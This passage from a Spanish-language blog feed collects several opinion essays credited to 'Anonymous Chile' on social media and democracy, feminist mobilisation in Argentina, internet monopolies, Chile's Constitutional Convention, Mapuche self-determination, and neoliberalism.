Toda vez, para tener una participación efectiva en esta disputa, es importante entender que es un terreno minado, sembrado de algoritmos opacos que responden a intereses particulares, por lo que se requiere actuar con cautela y con entendimiento de las lógicas que allí operan. Entre ellas, podemos mencionar la facilidad con que se reparten rumores y noticias falsas, y la dificultad de identificar sus fuentes; la limitación que implica reducir el pensamiento e ideas complejas al tamaño de un tuit de 280 caracteres; y también la tendencia de los algoritmos a exacerbar la polarización de opiniones, al dar a los usuarios más de lo que les “gusta”. También es importante entender que los sectores de poder ya tienen todo un arsenal desarrollado, con fuertes inversiones, para imponerse en esta disputa.

Justamente, un reciente estudio de la Universidad de Oxford, constata evidencias de manipulación formalmente organizada de las redes sociales en 48 países de todos los continentes, (20 más que lo constatado el año anterior), principalmente bajo la forma de campañas de desinformación en períodos preelectorales. Esta manipulación es practicada principalmente por parte de agencias gubernamentales o partidos políticos, y apunta, entre otros: a crear y amplificar discursos de odio o difamación personal o grupal; generar narrativas e información falsa; desviar la atención temática; recolectar datos en forma ilegal; o minar procesos democráticos, censurando contra-narrativas. Existen, además, numerosas empresas consultoras especializadas en estas prácticas.

Las recientes elecciones en Brasil ponen en evidencia, nuevamente, la gravedad de esta manipulación para el futuro de nuestras democracias. Se ha denunciado que la campaña electoral de Jair Bolsonaro en Brasil ha contratado líneas telefónicas en el exterior del país para encaminar mensajes que se propagan a través de un sinfín de grupos Whatsapp, alcanzando decenas de millones de brasileños con mentiras y mensajes de odio contra el PT, que han calado en la conciencia popular.

Entonces, es un serio reto para actores sociopolíticos que luchan por la democracia y la justicia social pensar cómo enfrentar y contrarrestar estas manipulaciones, evitando caer en los mismos procedimientos cuestionables.

¿Se debe legislar sobre las RSD?

Ante la evidencia que ha salido a la luz pública sobre el alcance de tales prácticas, particularmente a raíz del escándalo de Cambridge Analytica / Facebook y su injerencia en las elecciones estadounidenses con datos obtenidos ilegítimamente, los legisladores de ese y otros países han comenzado a reconocer la necesidad de regular la práctica de las plataformas digitales. El problema es que las propuestas que plantean a veces podrían resultar peores que el problema en sí.

Una cosa es la necesidad de regular lo que las empresas pueden y no deben hacer con los datos personales y en qué casos se requiere de la autorización de la persona concernida. Otra cosa es regular lo que los individuos pueden o no hacer en Internet, más allá de lo que ya está estipulado en las leyes nacionales y normas internacionales referidas a los derechos humanos y la libertad de expresión.

Asimismo, preocupan las (falsas) soluciones que están proponiendo las mismas empresas para combatir el fake news, cuando se otorgan arbitrariamente el poder de censurar mensajes y fuentes según sus propios criterios; o pactan acuerdos con supuestas “agencias de chequeo de noticias” para que revisen la “veracidad” de las noticias en las RSD, (siendo que en varios casos estas agencias son los mismos grandes medios que se han mostrado poco éticos en materia de noticias falsas). Incluso hay países donde se propone encargar, por ley, este rol de juzgar contenidos a la policía.

Fácilmente tales mecanismos se convertirán en nuevas formas de acallar voces disidentes. Por lo mismo, es urgente abrir un amplio debate público sobre el sentido de las posibles regulaciones, manteniendo como principio central la defensa de la libertad de expresión como derecho de la ciudadanía, no como derecho de unos pocos grandes medios ni otorgando a las empresas mediáticas o tecnológicas el rol de jueces o censores.

Participación política y redes sociales digitales

Publicada el 28/06/2021 por Anonymous Chile

Esta presentación tiene por objetivo compartir con ustedes algunas reflexiones acerca de las estrategias de participación e intervención política de colectivos sociales, por un lado en el espacio físico de la ciudad y por el otro en el espacio virtual, especialmente en las redes sociales digitales[1] (RSD). Entendiendo que ambas esferas públicas conforman una suerte de espacios contiguos que brindan universos diferentes y complementarios para su acción, a la vez que se transita entre la vida pública y la personal o cotidiana.

En primer lugar, vale señalar que la adopción de las tecnologías digitales (TD) y la expansión de la web 2.0, ha permitido a los ciudadanos el acceso a Internet y a las tecnologías digitales en general. Las redes sociales digitales son apropiadas por la población en su conjunto, con mayor o menor intensidad (o acceso) según la edad, el género o las clases sociales, de tal forma que esta tecnología devino en una apropiación social de gran envergadura.

Desde el punto de vista del activismo social y político, las RSD representan otra esfera pública además de lo que podríamos denominar el espacio público tradicional. Si bien la movilización social se focaliza en la apropiación de un territorio, la visibilización de la acción, la configuración de un actor que pueda sentarse en una mesa de negociaciones, también el activismo en las RSD es una estrategia de disputa política, así como también el uso de otras plataformas como YouTube o Whatsapp. Los teléfonos inteligentes y las plataformas se han popularizado en los últimos cinco o seis años de tal forma, que hoy en día prácticamente todos los jóvenes poseen Smartphones que permiten su participación en estas redes en cualquier momento, lugar o espacio.

Estas esferas públicas emergentes brindan la posibilidad de expresar algo sobre uno mismo, o desde el sí mismo. Esto da lugar a una corriente de trabajo muy interesante, Winocur (2017) señala que esta forma de hacer pública la vida cotidiana a través de las redes sociales implica que lo privado es público y lo público es privado. Especialmente los jóvenes sienten que su presencia en este espacio es una manera de decir «yo aquí estoy, esto es lo que pienso», lo que puede dar lugar a situaciones interesantes de elaboración de prácticas conjuntas.

Retomando la cuestión principal que nos ocupa, podemos advertir que las RSD ocupan un lugar central en la vida social y política y por lo tanto es un espacio de disputa que permite popularizar, expandir y visibilizar el accionar de los colectivos sociales.

Por ejemplo, el movimiento de mujeres y el movimiento feminista en Argentina intervienen de manera masiva en la esfera pública el 3 de junio de 2015, con el slogan “NiUnaMenos”, popularizado en las RSD como #VivasNosQueremos. Esta movilización se expresó en marchas multitudinarias en todo el país, como resultado de una convocatoria multimediática y multisectorial, que se articuló en torno a una demanda histórica del feminismo y el movimiento de mujeres. Fue convocada a través de las redes sociales, por numerosas organizaciones de mujeres, de derechos humanos, familiares y víctimas de violencia de género, artistas, intelectuales y periodistas, entre otras, y se considera la mayor movilización en la historia del país vinculada con una temática feminista. Las dos plataformas comerciales más utilizadas fueron Facebook y Twitter. Su reclamo excedió lo testimonial o la toma de conciencia, puesto que en reiteradas ocasiones se ha realizado fuertes reclamos al Gobierno sobre la sanción y ejecución de leyes específicas y políticas públicas para contención/apoyo a las víctimas.

En este sentido, Internet aceleró y distribuyó los intercambios, transmitió mensajes, sentidos, contribuyó a la construcción de nuevas subjetividades y trastocó las nociones tradicionales de tiempo y de espacio, que ya se vienen transitando desde hace varios años. De manera que el acontecimiento #VivasNosQueremos, fue justamente esa concreción en un espacio y en un tiempo compartido en diferentes escenarios de América Latina.

En Argentina ya se ha visto antecedentes de movilizaciones generadas en las RSD, como por ejemplo los “cacerolazos” organizados en contra de la ex presidenta Cristina Kirchner en el año 2015. Esta acción demostró que las redes sociales, además de posibilitar estos acontecimientos, también generan procesos de intervención deliberada en este espacio público. Los cacerolazos contra Kirchner, que inicialmente pudieron haber surgido de manera espontánea, luego fueron dominados y dirigidos por medios opositores al gobierno, incluso por los propios Trolls del actual gobierno de Mauricio Macri, en ese momento en la oposición.

Procesos organizativos y RSD

Continuando con el movimiento de mujeres, es interesante destacar en relación a la denominada brecha de género –que parte de la evidencia de que las mujeres sufren desventajas en el acceso a las TD respecto de los hombres– que hoy en día el movimiento hace un uso inteligente e intensivo de Internet. Esto quiere decir que las mujeres compartimos con los hombres la misma posibilidad de acceso y problematización del fenómeno. El crecimiento de la movilización y el desarrollo de las apropiaciones tecnológicas, dan fuerza a un movimiento de mujeres renovado en ese sentido.

Ahora bien, sería un error pensar que las redes sociales generaron el fenómeno NiUnaMenos. Este, como otros estallidos sociales, viene de un largo proceso. Según Claudia Laudano, el movimiento feminista en Argentina tiene antecedentes de lucha desde los años 60s. Entre ellos se destaca el Encuentro Nacional de Mujeres, que se realiza anualmente en distintas ciudades del país y suma 32 ediciones al año 2018. La misma autora señala que otro acontecimiento muy importante, gestionado y organizado a través de las RSD, fue el primer paro internacional de mujeres realizado el 8 de marzo del 2017, con la adhesión de 57 países, donde la región Latinoamericana tuvo una destacada participación. Esta articulación internacional referenciada con diferentes casos, se fue desarrollando a lo largo del tiempo, lejos de ser espontánea o improvisada abarcaron un periodo organizativo muy importante (Laudano, 2018). Es decir, para poder llegar a este paro internacional de mujeres se llevaron adelante gran cantidad de acciones previas en distintos lugares del mundo.

A través de Twitter, se desarrolló una acción muy potente y planificada el 25 de noviembre de 2017, un día central en el reclamo de las agendas feministas y en particular en Latinoamérica. Con un slogan muy interesante que era «las mujeres del mundo anunciamos que nos estamos organizando» se alcanzaron los primeros puestos de las tendencias mediáticas, con diferentes hashtags. Las organizaciones invadieron Internet con muchísimas imágenes y videos de las acciones que se produjeron en el territorio en esta suerte de combinación de las dos esferas públicas, el ciberespacio y el territorio.

Asimismo, muy recientemente, la movilización de mujeres impulsó la discusión en el Congreso Nacional Argentino sobre la legalización del aborto, hecho sin precedentes en el país. Con el lema aborto legal, seguro y gratuito nuevamente se produjo una enorme movilización de mujeres (y hombres). Lamentablemente no se aprobó la ley, pero generó un importante debate que atravesó a todos los sectores de la sociedad. También produjo una respuesta furibunda por parte de los sectores más conservadores; no obstante se encuentra en las puertas de ser aprobado en el próximo año.

Nuevamente se plasmó en las redes sociales el problema del acoso y la violencia de género. Con el objetivo de hacerlo visible y público se publicaron en Internet miles de testimonios de mujeres que cuentan sus experiencias de violencia, cuestiones que hasta no hace mucho tiempo pertenecían sólo al ámbito de lo privado.

Disyuntiva

Sin embargo, como ya se ha mencionado en este seminario, de manera creciente preocupan los riesgos en la seguridad y privacidad de los datos, el peligro de censura y la falta de adaptación de estas tecnologías a las necesidades reales y específicas de los movimientos sociales. De manera que los colectivos atraviesan una disyuntiva, entre proteger su privacidad e intervenir en las RSD privativas de enorme capacidad para la comunicación y convocatoria. Reconocen que Facebook, Twitter o Instagram, potencian la posibilidad de hacer conexiones y de vincularse con otras personas a partir de intereses comunes.

En este marco, el uso disruptivo de tecnologías propietarias y la creación de proyectos propios de innovación tecnológica como las RSD libres, aún es muy incipiente, al menos en el movimiento social argentino. Algunas organizaciones, con capacidades para la creación y desarrollo de TD, intentan desarrollar espacios tecnológicos propios, pero los mismos dejan fuera a los “otros”, que es el gran público. No obstante este sujeto colectivo es cada vez más un productor activo de significados.

Por último, la promoción por parte de las organizaciones, las universidades y los activistas en su conjunto, de desarrollos propios (como las RSD libres) y la soberanía tecnológica, es muy importante. Es necesario ponernos a trabajar (o continuar trabajando) en torno a estas fricciones, en Argentina por lo menos nada se puede esperar de políticas públicas en este sentido.

Contra la transformación social: El firewall monopólico en las redes sociales digitales

Publicada el 28/06/2021 por Anonymous Chile

Nos hemos convertido en seres mediáticos, vivimos online, conectados, en permanente relación con medios y mucho de lo que hacemos tiene que ver con ellos. Además, la comunicación ha superado hoy los límites del tiempo y del espacio. El mundo digital de la comunicación va suplantando al viejo mundo analógico. Todo es inmediato y cercano. Los bits de información se nos introducen por todos los poros. 55% de las personas en el planeta ya tiene acceso a internet. Ya terminó aquel corto tiempo en que internet parecía ser lo que prometía, una fabulosa red de intercambio de conocimiento. Hoy a través de la red viaja cada vez más basura.

No podía ser de otro modo: el conocimiento es poder y el poder no quiere compartirse, por eso impide que el conocimiento sea democratizado. El control del conocimiento es un hecho histórico. El antiguo rol de las tradiciones, los reyes y los sacerdotes hoy ha sido asumido por las corporaciones.

Hablando sólo del mundo occidental, hoy en descenso pero aún condicionante, las cinco principales corporaciones en internet Alphabet-Google, Amazon, Facebook, Apple y Microsoft, pero también las productoras de contenido Disney, Time Warner, Comcast, las propietarias de los sistemas de comunicación AT&T, Verizon, por sólo citar algunas, configuran gran parte de casi todo lo que se ve – y por supuesto, de lo que no debe verse. Estas corporaciones a su vez son controladas por fondos de inversión. Siempre a la cabeza están los inversores institucionales Vanguard, BlackRock y State Street Global Advisors, manejando trillones de dólares, los mismos que son principales accionistas del 90% de las empresas listadas en el índice SP500.

O sea, los monopolios están monopolizados y el control de las empresas más grandes de comunicación del planeta, está bajo control del capital financiero cuya única lógica es la expansión de sus negocios.

Las ganancias y el valor de mercado dependen en general del número de usuarios. Por ello la metodología de las empresas es arrebatar usuarios a la competencia, hasta liquidarla. Y si no les posible, intentar comprarla. La política de los principales inversores institucionales es invertir proporcionalmente en todas, para no perder nunca. La lógica del monopolio es la del negocio y la lógica del negocio es el monopolio.

Los monopolios en internet son los dueños de la mentira, pero también los dueños de la verdad –como ya dijimos– para no perder nunca.

Ese es el orden a subvertir. Ese es el firewall, la muralla a derribar para que la comunicación sea democrática y esté al servicio de la transformación social.

¿Cómo derribar la muralla?

En relación a los monstruos digitales, es necesario contar con un mapeo de alternativas libres, descentralizadas y federadas. Servidores, redes, medios, software, servicios alternativos en cada lugar. A lo cual se podrían agregar una larga lista de insumos y herramientas de esclarecimiento y aprendizaje ya existentes. Dar impulso a los laboratorios de recursos digitales antihegemónicos, online, de gestión colaborativa, que sirvan de apoyo a la lucha antimonopólica.

Sin embargo, aunque positivo en sí mismo, no es suficiente interactuar en otros espacios. La lucha por la recuperación de una internet ciudadana y de un mundo inclusivo es sin duda política y cultural. Generar exclusivamente situaciones de aislamiento relativo con la apertura de vías paralelas no es conveniente. También hay que interactuar o incidir en los espacios digitales existentes, por ahora mayoritarios, aunque en algunos casos estén declinando o hayan alcanzado su techo. El mundo de las redes sociales es inestable y la migración –sobre todo generacional– es tan veloz como el crecimiento que estas empresas han experimentado en corto tiempo.

Riesgos y limitaciones de las redes sociales privativas

Es fundamental perder ingenuidad, conocer y entender la amenaza de las redes sociales actuales y cómo manejan o procesan nuestros datos personales. Éstas se nutren de los datos personales y de cada interacción para luego monetizarla, por vía de la venta de propaganda segmentada o por la cesión de los mismos a empresas de marketing, manipulación política o de vigilancia gubernamental.

En cuanto a las limitaciones, entender que lo que se transmite o recibe pasa por la censura de un mecanismo de selección matemática, conocido como algoritmo. Aunque no sea esa su etimología verdadera, esta operación automática permite que “algo” se difunda y que ese “algo” pierda o gane “ritmo” en el transcurso de sucesivas publicaciones. Por su propio funcionamiento, las redes sociales, en apariencia masivas, conducen habitualmente a un circuito restringido, a un círculo más o menos cerrado de contactos con los que se interactúa.

Es obvio que estas barreras son en parte levantadas por las empresas cuando el usuario se convierte en anunciante.

Sin embargo, es posible quebrar dicha lógica por una multiplicación masiva y relativamente coordinada. Esta característica ha permitido convocar a eventos, formar grupos extensos y difundir acciones silenciadas por otras vías, aunque del mismo modo ha habilitado la difusión automatizada de información envenenada.

Cuando se llega a números masivos o la información que circula es vista por el poder como un peligro (para los intereses del poder), las compañías privadas tienen la posibilidad –por su carácter centralista– de bloquear grupos, cuentas o información. Y así lo hacen, arbitrariamente, bajo el manto de “mantener comunidades seguras”.

Por lo demás, se ha producido ya en las redes una saturación de información adulterada o directamente ficticia. Cuentas y noticias falsas, imágenes manipuladas, memes distorsivos, son parte de este arsenal de posverdad que ha polucionado sin remedio estos mecanismos. No podía ser de otro modo.

Ante la pérdida de audiencia de los medios de difusión tradicionales, la mentira y el control del capital se han abalanzado sobre los canales digitales. Este ataque se agudiza en épocas electorales en las que se desarrolla una muy intensa guerra sucia contra candidatos progresistas o de izquierda. El sujeto político es reemplazado por la industria de la difamación electrónica.

Incluso los medios mentirosos de siempre, los hegemónicos, ante el aluvión desinformativo que circula en internet, tratan de recuperar audiencia revistiéndose con una pátina de “información chequeada”. Las usinas de chequeo son financiadas en casi todos los casos por fundaciones de la derecha neoliberal conspirativa que, sobre todo, las direccionan a combatir el “discurso público” de los gobiernos, socavando sutilmente toda confianza ciudadana en el sistema democrático de gobierno.

El interés mediático, digital o no, es siempre empresarial, nunca ético. Su objetivo es no perder usuarios, audiencia, consumidores, poder, o sea, dinero.

En cuanto al sistema legal, comienzan a ser sancionadas leyes y normativas que, en vez de controlar a las empresas, censuran o multan al usuario. Probablemente se empiece a extender el clamor por una internet “limpia”, pero paga y monitoreada.

La lucha es cultural y política, dentro y fuera de internet

En un mundo fragmentado, las redes sociales dan la sensación ficticia de compensar la soledad y la atomización social, generando un exceso de utilización en desmedro de la interacción directa. Algo similar ocurre en relación a la acción política, derivándose buena parte de la energía al reclamo electrónico en reemplazo de la manifestación pública en las calles o de la construcción de tejido organizado en la población. En este contexto, las redes sociales son apenas un modo de contacto limitado dentro de un amplio universo de posibilidades de acción.

En definitiva, como se dijo antes, la lucha es cultural y política, dentro y fuera de internet. Necesitamos esclarecer y llegar al 99% oprimido por un sistema de dominación enfermo que prioriza al dinero como motor y objetivo de la vida. Avanzar sobre la mentira y exigir un nuevo modo de existencia. Crear un mundo nuevo es factible a partir de la utopía que se instala como imagen y posibilidad en la conciencia de millones de personas, sobre todo, de las y los jóvenes. A ello tenemos que contribuir, a crear y difundir la utopía como única salida a esta civilización decadente de compraventa.

Convención Constituyente: Legitimidad versus legalidad

Publicada el 28/06/2021 por Anonymous Chile

En todos los períodos históricos en que las sociedades entran en profundas transformaciones se suscitan fuertes conflictos entre las elites que buscan defender lo más posible lo antiguo (en nuestro caso los “30 años”); y los que están en búsqueda de un nuevo orden. Una de las expresiones clásicas de este conflicto es el de la legitimidad versus la legalidad. De este modo, las elites existentes pretenden estrechar lo más posible los cambios a través de la recurrencia a la antigua legalidad; y quienes son portavoces de las ansias de transformaciones de las grandes mayorías buscan naturalmente lo contrario: Que la nueva legitimidad no quede entorpecida u obstruida por aquella legalidad expresiva del sistema antiguo.

No debiese, por tanto, llamar para nada la atención el conflicto actual entre los sectores mayoritarios y minoritarios de la Convención Constituyente. Los primeros buscan naturalmente ser libres para representar efectivamente a las mayorías populares que los eligieron; y los segundos –conscientes de su minoría electoral y política; y, sobre todo, de su creciente pérdida de legitimidad- buscan colocarle una camisa de hierro a la Convención. No sólo a través de hacer efectivo el antidemocrático quórum de los dos tercios; sino también con intentos de hacerlos “jurar” el respeto a una condición de organismo con un poder completamente derivado de un Congreso cuyas cotas de ilegitimidad son difícilmente comparables internacionalmente. Y, por cierto, teniendo como último recurso, ¡un control de la Corte Suprema sobre el comportamiento de la Convención!

Es lo que pasa en los procesos históricos de cambios profundos. Lo viejo se resiste a desaparecer; y lo nuevo no nace plácidamente. Y a lo viejo, acostumbrado al antiguo marco conceptual, le es muy difícil incluso comprender lo que viene. Y trata de hacer como si todo básicamente siguiese el orden preestablecido. ¡Tratan de “domesticar” en la antigua legalidad el profundo significado histórico del “estallido”, “revuelta” o “rebelión” de octubre de 2019! ¡Buscan engañarse a sí mismos creyendo que el Congreso electo en 2017 sigue teniendo la misma legitimidad después de 2019!

Es cierto que el maquiavélico ardid del 15 de noviembre de 2019 representó el último “magnífico” intento de las dos derechas que legitimaron, consolidaron y perfeccionaron el modelo neoliberal impuesto por la dictadura, por continuar engañando a la sociedad chilena. Tan notable fue el intento que ¡hasta lograron engatusar a varios partidos del Frente Amplio; incluyendo a su precandidato presidencial actual! Sin embargo, ni los más esclarecidos o más manipuladores políticos de la historia pueden torcer, en definitiva, su curso. La derecha tradicional no alcanzó a obtener el tercio de la Convención que le había previsto la dirigencia de la antigua Concertación (para de este modo haber podido “culpar” a la “derecha” de no haber podido obtener una Constitución mejor; como lo hicieron análogamente en 1989). Y en la Convención, el PDC, el PPD y el PR desaparecieron virtualmente del mapa. Y los convencionales del PS –¡en lo que puede constituirse la salvación futura del socialismo chileno!- están planteando una postura política de transformación profunda del modelo que su dirigencia contribuyó tanto –como las dirigencias del PDC, PPD y PR- a consolidar en estos 30 años.

Porque no nos olvidemos que los dirigentes socialistas en estos años fueron tanto o más responsables (dada la militancia de Lagos y Bachelet) del regalo de la mayoría parlamentaria a la derecha en 1989; de la política de destrucción de los medios de comunicación de centro-izquierda seguida por los sucesivos gobiernos concertacionistas; de la consolidación de las AFP, Isapres, Plan Laboral, etc.; de la condonación de las corruptas privatizaciones de la dictadura, y de la progresión de ellas al litio, a la mayoría del cobre, al mar, al agua, a los puertos, a los caminos, etc.; de la “exitosa” búsqueda de la impunidad internacional y nacional de Pinochet; y de la entusiasta aprobación consensual de ¡la actual Constitución!, refrendada por Lagos y todos sus ministros (incluyendo Vidal, Eyzaguirre y Provoste); y definida entusiastamente en su ceremonia de inauguración por aquel como una “Constitución democrática que ya no nos divide”…

Lucha Mapuche y Proceso Constituyente: Justicia y dignidad para los Pueblos y Naturaleza

Publicada el 28/06/2021 por Anonymous Chile

Natividad Llanquileo, mujer mapuche y campesina. Nacida, criada y con residencia en la comunidad mapuche Esteban Yevilao de la comuna de Tirúa. De profesión abogada de la Universidad Bolivariana, Diplomada en Derechos Humanos, Políticas Públicas e Interculturalidad de la Universidad de la Frontera. En el año 2018 fue presidenta del Centro de Investigación y Defensa Sur y actual directora de Relación con el medio nacional e internacional.

En la elección por escaños reservados Pueblo Mapuche de la Convención Constituyente, del 15 y 16 de mayo del 2021, con una campaña autogestionada, obtuvo la segunda mayoría de los votos con 13.083 correspondiente al 6,00%

Ha sido uno de los nombres que ha tenido una alta consideración en expresiones autónomas e independientes vinculadas a organizaciones sociales para que fuese parte de la directiva de la Convención Constituyente y a pesar de haber manifestado su disposición de acuerdo con la decisión de su colectivo, ha sido desestimada por sectores mapuche más institucionalizados, como también por sectores políticos del Frente Amplio, sumado a la reticencia desde grupos de poder político y económico en el tradicional binominal.

Hay que destacar, que Llanquileo ha señalado que, paralelamente al proceso constituyente del Estado chileno, es importante y fundamental avanzar en los caminos propios de autonomía y autodeterminación de los Pueblos.

A continuación, se comparte artículo de la Constituyente Mapuche publicado hace algunas semanas en la versión impresa de Le Monde Diplomatique – Edición chilena, denominado: “Proceso Constituyente: Justicia y dignidad para los Pueblos y Naturaleza”

Proceso Constituyente: Justicia y dignidad para los Pueblos y Naturaleza

Por Natividad Llanquileo Pilquimán

Participar del proceso constituyente no ha sido una decisión fácil, sin embargo,  se tomó una decisión colectiva con personas de diversos territorios, tanto urbano como rural, de proponer esta candidatura, abriéndose  diversos espacios de encuentros facilitados por el Colectivo Trür Igualdad, desde donde se consideró relevante  participar para incidir en la toma de decisiones de la Convención Constituyente y así,  salimos con la convicción de que sí se podía.

Asimismo, también comprendemos diversas posiciones críticas, reticentes y de desconfianza que ha existido al proceso desde expresiones autónomas disidentes, varias se comparten plenamente. Es evidente que ha existido intentos de manipulación desde los sectores dominantes del poder político y económico.  La exclusión de la Asamblea Constituyente, el poder del capital para campañas electorales,  el control de medios masivos de información, la instrumentalización de encuestas, el marco normativo e institucional, en fin, una serie de elementos de desventaja y discriminación, sin embargo, aun así, hasta con una importante dispersión de votos desde colectividades políticas disidentes, movimientos sociales y autónomas, no pudieron y lo del 15 y 16 de mayo ha sido un nuevo hito histórico que cambia profundamente los ejes y el horizonte.

Todos los fatalismos anunciados con antelación que tendrían independientes organizados fracasaron. Todos los ninguneos y cercos informativos, fracasaron. Y todos los señalamientos que en realidad la gente no quiere cambiar el sistema, fracasaron. Hoy, hay señales claras y concretas que sí se quiere cambiar el régimen político y el modelo económico, que si se quiere construir caminos de justicia y dignidad para los Pueblos y que fue parte de nuestra consigna principal y propuesta programática.

Las estrategias de movimientos sociales y sus movilizaciones en diversos escenarios como ha sido en la calle, en las urnas y en las intervenciones de los espacios de tomas de decisiones, así como de comunidades,  organizaciones y colectivos de Pueblos Originarios,  quebró el sistema partidista del oligopolio político económico y lejos de ingenuidades, están dando frutos y esperanzas concretas.

Es muy importante valorar  que personas muy inteligentes, luchadoras sociales, trabajadoras de mucho esfuerzo y sacrificio, que han sido víctimas de la represión estatal y las desigualdades del neoliberalismo, con algunos casos de  prisión, persecución, represión, tanto mapuche, chilena y de otros pueblos, incluso algunos no creyendo que la Convención Constituyente sea un fin, sino un medio, hoy sean dignas representaciones electas,  la mayoría con campañas autogestionadas, como fue la nuestra, a pulso y con mucho esfuerzo, que se enfrentó a millonarias campañas de partidos políticos y empresariales.

No está demás decir, que seguramente, sectores vinculados al poder político y económico que ha dominado todo este tiempo bajo el amparo constituyente otorgado por la dictadura, en medio de su catarsis y decadencia, con diversos tentáculos y dimensionando parte de sus historiales de abusos, arrogancias, saqueos  y opresión, con una absoluta incapacidad democrática,  van a intentar de una u otra forma sabotear y conspirar contra todo avance transformador, por lo tanto los logros y conquistas van a tener que cuidarse dentro y fuera de la Convención.

También es importante señalar que las malas prácticas de la partitoracia con formas centralistas, individualistas, caudillistas, neo coloniales, verticales y arbitrarias, de una u otra forma son transversales, también de alguna manera han sido reproducidas por partidos de izquierda de la nueva generación y también podría salpicar a movimientos sociales con listas constituyentes, siendo indispensable autoregularse constantemente.

En nuestro caso, el proceso que hemos vivido en el marco constituyente ha sido participativo y colectivo. La elaboración de una propuesta programática fue nutrida en diversos espacios. Todas las semanas el Colectivo Trür Igualdad junto a werken comunicaciones mantuvo la transmisión del “Txawün Constituyente”, con diversas personas invitadas, varias especializadas en materias como también representativas de territorios y organizaciones. También tuvimos múltiples encuentros, nvtram y reuniones presenciales, con diferentes comunidades y agrupaciones, recabando allí múltiples sentimientos, anhelos, demandas y propuestas. Así, paso a paso se fue construyendo nuestra propuesta y son las instancias a la cual nos debemos y que nos han establecido un mandato.

Es importante recordar, que en febrero de  este 2021, en la Pampa de Koz-koz en la comuna de Panguipulli, tuvimos un importante encuentro de candidatas y candidatos constituyentes mapuche a escaños reservados e independientes, convocados por el Parlamento de Koz-koz, donde asumimos un compromiso colectivo en la defensa de los derechos de nuestro pueblo, teniendo siempre como horizonte la reconstrucción de la nación mapuche, entendiendo también que hay diversos temas transversales que involucra los intereses y necesidades de todos los pueblos.

Se señala esto, porque quienes representamos sentires colectivos y venimos desde un movimiento autónomo, tenemos que cambiar las formas imperantes que ha habido en las tomas de decisiones en diversas escalas, como han sido los fracasados sistemas de delegación de la representatividad y acuerdos en cuatro paredes. Es indispensable que los espacios sean abiertos, transparentes, que nuestras comunicaciones con las instancias que representamos sean con una fluida retroalimentación, con decisiones compartidas y relaciones horizontales.

Algunos de los ejes Constituyentes

Desde los inicios de este andar, hemos sostenido que la soberanía debe recaer en todos los Pueblos que habitan Chile, con un reconocimiento explícito como sujetos de derechos colectivos cuyo matiz es la autodeterminación. No hacerlo, es seguir extendiendo los actos históricos y sistemáticos de violencia, despojos, masacres, discriminación, abuso, arbitrariedad y dominación.

Construyendo participativamente nuestra propuesta programática, decidimos agrupar las temáticas recabadas en cuatro ejes principales que son parte de nuestro horizonte y que esperamos poder complementar de la mejor forma con las diferentes expresiones democráticas. A continuación, un extracto de ellas:

1.- Reconstruír el valor de lo diverso / Plurinacionalidad kimcegen: La plurinacionalidad no es una creación jurídica nueva: es la aceptación normativa de nuestra realidad territorial y cultural. Este reconocimiento no es relevante si sólo se limita a lo simbólico. Primero es fundamental reconocernos y posibilitar la máxima realización dentro de nuestra diversidad. El Estado Plurinacional no es un Estado de naciones enfrentadas o enemigas, sino donde caben todas las naciones, valoradas, respetuosas de los DDHH de todas las personas y hermanadas a partir de intercambios recíprocos de saberes y cosmovisiones, que aseguren un buen vivir para las actuales y futuras generaciones, bajo un marco de reconocimiento explícito de derechos en igualdad.

2.- Una nueva relación con la naturaleza / Feyentun itrofillmogen: Para alcanzar un Estado de bienestar colectivo, hemos de situar en el centro del modelo económico, político y social la protección de las diversas formas de vida, el itrofillmongen en nuestra concepción mapuche. Para eso, proponemos reconocer el derecho a un acceso justo y equitativo de los bienes comunes, en un modelo que proteja la naturaleza y sus integrantes. Para lograrlo, es clave reconocer los derechos de la naturaleza y romper con la visión que cree posible seguir con la depredación para sostener un modelo injusto, que beneficia a unos pocos y sin ningún límite en el interés colectivo. En su lugar, creemos que se la debe concebir como un gran ser vivo con un valor intrínseco.

3.- Fortalecimiento y ampliación de derechos / Kume mongen: Para que la nueva Constitución garantice una vida  digna y plena para todos/as, creemos que es necesario redefinir el rol del Estado: abandonar la pasividad y subsidiariedad privatizadora actual para asumir un rol principal y activo, que asegure los derechos sociales, económicos y ambientales básicos, indispensables para vivir en dignidad, basado en principios de justicia, solidaridad y sustentabilidad, incentivando formas económicas más vinculadas a la comunidad, a los territorios, y basadas en la reciprocidad y la complementariedad. Salud, vivienda digna, educación de calidad, medio ambiente, respeto y desarrollo saludable niñez y adolescencia, entre otros. También  derecho a la identidad cultural colectiva, migración,  el derecho al agua, vivienda digna,  alimentación bajo principios de soberanía y justicia alimentaria y la incorporación de los saberes ancestrales.

4.- Para un país digno y sostenible: más y mejor democracia / Fill ta iñchiñ allkütugeaiñ: La Nueva Constitución debe contemplar mecanismos de democracia directa como  iniciativa popular de ley, el plebiscito, el referéndum revocatorio de leyes injustas y de mandatos de autoridades que violan los DDHH, y presupuestos participativos a nivel comunal y regional, entre otros; justicia tributaria; democratización y desconcentración.

El gran fracaso del neoliberalismo

Publicada el 28/06/2021 por Anonymous Chile

Desde finales de la década de los años 70 (en la Gran Bretaña, con el Gobierno de la señora Thatcher), y principios de la década de los años 80 (en Estados Unidos con el Gobierno del presidente Reagan), se inició lo que algunos autores han definido como La Revolución Neoliberal, pasando a ser el neoliberalismo la ideología dominante del pensamiento económico, que más tarde hizo suya la socialdemocracia (en una versión más moderada) en Europa a través de La Tercera Vía con Tony Blair en la Gran Bretaña, Schröder en Alemania, Hollande en Francia y Zapatero en España, inspirados, estos últimos, por los cambios iniciados en el Partido Demócrata de los Estados Unidos (por el presidente Clinton seguidos más tarde por el presidente Obama).

Este pensamiento, que se convirtió en dogma, gestionado por su Vaticano, el fórum de Davos, sostenía (en teoría) tres principios. Primero: el Estado, conocido como «El Gobierno», tenía que reducir sus intervenciones, (regulación y gasto público). Como decía el Presidente Reagan «Government is not the solution, rather it is part of the problem«. Segundo: los mercados laborales, financieros y comerciales, deberían estar desregulados a fin de liberar el enorme potencial creador que tenían los mercados. Y tercero: la movilidad global del mundo del trabajo y del capital debía facilitarse dentro de un proceso de globalización. Como consecuencia de la supuesta aplicación de estos tres principios, se señaló que hubo un enorme crecimiento de la economía mundial bajo un nuevo orden internacional, en que los Estados estaban perdiendo su poder siendo sustituidos por empresas multinacionales que centraron la actitud y la actividad económica en su globalización. Hasta aquí la teoría, veamos ahora la realidad.

La falsedad de tal dogma: su carencia de credibilidad

